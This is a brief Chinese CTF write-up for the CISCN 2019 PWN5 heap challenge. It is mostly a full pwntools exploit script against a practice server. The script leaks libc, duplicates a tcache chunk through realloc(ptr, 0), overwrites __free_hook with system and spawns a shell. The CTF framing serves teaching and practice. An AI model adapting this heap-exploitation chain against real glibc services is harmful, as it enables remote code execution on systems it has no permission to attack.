Problem: [CISCN 2019东南]PWN5
思路
- 利用
realloc(ptr, 0)造一个dup的tcache chunk
EXP
#!/usr/bin/env python3
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/libc6_2.27-3ubuntu1_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "node5.anna.nssctf.cn"
port = 26927
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/libc6-dbg_2.27-3ubuntu1_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/glibc-source_2.27-3ubuntu1_all/usr/src/glibc/glibc-2.27
'''
def start():
if args.P:
return process(elf.path)
elif args.R:
return remote(host, port)
else:
return gdb.debug(elf.path, gdbscript = gs)
io = start()
# pwn :)
menu = b'Your choice:'
def ch(idx):
io.recvuntil(menu)
io.sendline(str(idx).encode())
def add(size, data = b'\n'):
ch(1)
io.recvuntil(b'size?>')
io.sendline(str(size).encode())
io.recvuntil(b'content:')
io.send(data)
def edit(idx, data):
ch(2)
io.recvuntil(b'Index:')
io.sendline(str(idx).encode())
io.recvuntil(b'content:')
io.send(data)
def show(idx):
ch(3)
io.recvuntil(b'Index:')
io.sendline(str(idx).encode())
def free(idx):
ch(4)
io.recvuntil(b'Index:')
io.sendline(str(idx).encode())
def uafree(idx):
ch(2)
io.recvuntil(b'Index:')
io.sendline(str(idx).encode())
io.recvuntil(b'Can not edit this flag!')
def ex():
ch(5)
add(0x500) #0
add(0x60) #1
free(0)
add(0x200, b'\xd0') #0
show(0)
io.recvuntil(b'Content: ')
libc_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 0x3ec0d0
log.info("libc_base --> "+hex(libc_base))
add(0) #2
uafree(2) #2 freed but still in chunk_list[2]
add(0x10) #3 and 2 --> dup
add(0x10, b'/bin/sh\x00') #4
add(0x10) #5
free(5)
free(2)
edit(3, p64(libc_base + libc.sym['__free_hook']))
add(0x10)
add(0x10, p64(libc_base + libc.sym['system'])) # __free_hook to system
free(4)
io.interactive()
总结
- 对该题的考点总结